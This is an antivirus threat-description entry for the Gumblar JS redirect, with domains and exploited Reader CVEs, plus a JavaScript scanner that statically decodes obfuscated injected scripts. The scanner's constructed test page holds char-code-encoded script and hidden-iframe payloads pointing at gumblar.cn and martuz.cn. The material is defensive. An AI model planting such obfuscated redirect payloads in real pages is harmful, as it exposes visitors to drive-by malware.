JS/Redir.MR!tr

Alias/es: Troj/JSRedir-R (Sophos)
Release Date: May 15, 2009
Detection Availability
                 Active Database   Extended Database
  FortiGate      low               high
  FortiClient
  FortiMail      N/A
Current Antivirus Definition Database Version: 12.196
Description

Visible Symptoms

  • Redirect to malicious websites.

Detailed Analysis

    JS/Redir.MR!tr is the first stage of a multi-stage drive-by download campaign also known as Gumblar, Zlkon, or GENO. In the first stage, an obfuscated script is injected into the pages of compromised websites via cross-site scripting.

  • The obfuscation technique varies between infections, but the script mostly decodes to the same malicious URL. The following domains are known to be used as second-stage malware domains as of this writing:
    • gumblar.cn
    • Martuz.cn
  • The second stage occurs when a user visits an infected website. The injected script redirects the browser to a malicious website hosting further malicious downloadable components, such as PDF and SWF files. These files contain exploits that eventually download a malicious Win32 executable.

  • Notable exploits target vulnerabilities in the Adobe Reader JavaScript methods Collab.collectEmailInfo() (CVE-2007-5659) and util.printf() (CVE-2008-2992) by passing overly long arguments to the affected functions.

  • Earlier versions of Foxit Reader were also affected by a util.printf() vulnerability of the same kind (CVE-2008-1104).

  • Apply the vendor patches for the affected vulnerabilities.

  • Some reports indicate that this malware may also redirect Google search results.
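Added example (not Fortinet's code and not a sample from the campaign): a static scanner that pulls inline scripts out of a page, decodes two common String.fromCharCode obfuscation patterns of the kind the first stage uses without executing them, and flags any URL on the second-stage domains listed above. The sample page, its URL paths, the shift constant and the helper names are all constructed for this example; only the two domains come from the analysis.

```javascript
"use strict";

// Known second-stage domains from the analysis above (hostnames are
// case-insensitive, so everything is compared in lower case).
const KNOWN_STAGE2_DOMAINS = ["gumblar.cn", "martuz.cn"];

// Helper used only to build the constructed sample: turn text into a
// comma-separated list of character codes, each shifted by `shift`.
function toCodes(text, shift) {
  return Array.from(text, (ch) => ch.charCodeAt(0) + shift).join(",");
}

// CONSTRUCTED sample page; the URL paths are hypothetical. Two injected
// scripts are present: the first stores shifted char codes in an array and
// subtracts a constant, the second calls String.fromCharCode directly.
// The literal "</script>" never appears in the page source; it only exists
// after decoding, which is one reason attackers encode the payload.
const PAYLOAD_A = '<script src="http://gumblar.cn/x/"></script>';
const PAYLOAD_B = '<iframe src="http://martuz.cn/in.cgi?3" width=1 height=1></iframe>';
const SAMPLE_HTML = [
  "<html><body><h1>Welcome</h1>",
  `<script>var k=[${toCodes(PAYLOAD_A, 11)}];var s="";` +
    `for(var i=0;i<k.length;i++){s+=String.fromCharCode(k[i]-11);}document.write(s);</script>`,
  "<p>Legitimate content</p>",
  `<script>document.write(String.fromCharCode(${toCodes(PAYLOAD_B, 0)}));</script>`,
  "<script>var lib = 'http://example.com/legit.js';</script>",
  "</body></html>",
].join("\n");

// Statically decode the two String.fromCharCode patterns in one script body.
// Returns every decoded string found (possibly none).
function decodeScript(body) {
  const decoded = [];

  // Pattern 1: String.fromCharCode(60,105,...) with literal codes.
  const direct = /String\.fromCharCode\(\s*((?:\d+\s*,\s*)+\d+)\s*\)/g;
  for (const m of body.matchAll(direct)) {
    decoded.push(String.fromCharCode(...m[1].split(",").map(Number)));
  }

  // Pattern 2: a numeric array plus per-element arithmetic, e.g.
  // var k=[71,...]; ... String.fromCharCode(k[i]-11)
  const arrays = new Map();
  for (const m of body.matchAll(/(\w+)\s*=\s*\[\s*((?:\d+\s*,\s*)+\d+)\s*\]/g)) {
    arrays.set(m[1], m[2].split(",").map(Number));
  }
  const indexed = /String\.fromCharCode\(\s*(\w+)\[\w+\]\s*(?:([-+*/])\s*(\d+))?\s*\)/g;
  for (const m of body.matchAll(indexed)) {
    const codes = arrays.get(m[1]);
    if (!codes) continue;
    const n = Number(m[3]);
    const ops = { "-": (c) => c - n, "+": (c) => c + n, "*": (c) => c * n, "/": (c) => c / n };
    const adjust = ops[m[2]] || ((c) => c);
    decoded.push(String.fromCharCode(...codes.map(adjust)));
  }
  return decoded;
}

// Scan an HTML document: extract inline <script> bodies, look at both the
// clear-text body and anything it decodes to, and report every URL whose host
// is (or is a subdomain of) a known second-stage domain.
function scanHtml(html, knownDomains = KNOWN_STAGE2_DOMAINS) {
  const findings = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  for (const m of html.matchAll(scriptRe)) {
    const body = m[1];
    const candidates = [{ text: body, obfuscated: false }]
      .concat(decodeScript(body).map((t) => ({ text: t, obfuscated: true })));
    for (const { text, obfuscated } of candidates) {
      for (const u of text.matchAll(/https?:\/\/([^\s"'/<>]+)[^\s"'<>]*/gi)) {
        const host = u[1].toLowerCase();
        const hit = knownDomains.find((d) => host === d || host.endsWith("." + d));
        if (hit) findings.push({ host, url: u[0], obfuscated });
      }
    }
  }
  return findings;
}

console.log(JSON.stringify(scanHtml(SAMPLE_HTML), null, 2));
```

Run with `node`; both injected scripts are reported with `obfuscated: true`, while the clear-text example.com script is not. The regex-based decoder only handles the two patterns it knows, and, as the analysis notes, the obfuscation differs between infections and is often layered; for anything beyond a triage pass, evaluate the script in a sandboxed JavaScript interpreter with `document.write` and `eval` hooked, and apply the same domain check to whatever it emits.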


Description Last Updated Date: Jun 11, 2009
Reference: ID - 850946